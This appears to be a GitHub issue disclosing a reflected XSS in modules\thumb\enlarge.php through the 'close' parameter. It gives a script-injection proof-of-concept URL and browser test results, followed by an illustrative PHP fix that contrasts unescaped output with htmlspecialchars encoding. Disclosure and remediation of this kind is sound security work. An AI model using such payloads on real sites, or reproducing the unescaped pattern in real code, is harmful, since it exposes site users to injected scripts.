
XSS in modules\thumb\enlarge.php

Open jgj212 opened this issue 7 years ago • 1 comments

Here is an XSS vulnerability in modules\thumb\enlarge.php in the parameter close. PoC:

http://your-web-root/modules\thumb\enlarge.php?close="><script>alert(1);</script><"

This PoC will pop up a window in the Firefox browser.

jgj212, Sep 07 '17 11:09

Firefox - working
IE11 - not working
Chrome - not working

Gelezako, Sep 19 '17 16:09
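A server-side fix for the reflected `close` parameter, as an added example that is not the project's code: the source of enlarge.php is not shown in this issue, so the reflection into a double-quoted attribute (implied by the PoC's leading `">`), the markup and the function names are assumptions. The browser differences reported above are consistent with the reflected-XSS filters that Chrome and IE11 shipped in 2017, which do not replace output encoding on the server.

```php
<?php
declare(strict_types=1);

// Added illustration, not the source of modules\thumb\enlarge.php.
// Constructed sample input: the `close` value from the PoC in this issue.
$poc = ['close' => '"><script>alert(1);</script><"'];

// Assumed vulnerable pattern: the raw request value is concatenated
// into a double-quoted attribute, so `">` closes the tag early.
function render_unsafe(array $query): string
{
    $close = $query['close'] ?? '';
    return '<input type="hidden" name="close" value="' . $close . '">';
}

// Hardened form: encode for the HTML attribute context at output time.
function render_safe(array $query): string
{
    $close = $query['close'] ?? '';

    // `?close[]=x` arrives as an array; htmlspecialchars() rejects it,
    // so anything that is not a string is treated as empty.
    if (!is_string($close)) {
        $close = '';
    }

    // ENT_QUOTES is passed explicitly: before PHP 8.1 the default flags
    // left single quotes unescaped, which matters if the template ever
    // switches to single-quoted attributes.
    $escaped = htmlspecialchars($close, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<input type="hidden" name="close" value="' . $escaped . '">';
}

// Compare the two renderings of the same request.
echo render_unsafe($poc), PHP_EOL;            // markup breaks out of the attribute
echo render_safe($poc), PHP_EOL;              // payload stays inside value="..."
echo render_safe(['close' => ['x']]), PHP_EOL; // array input renders as empty
```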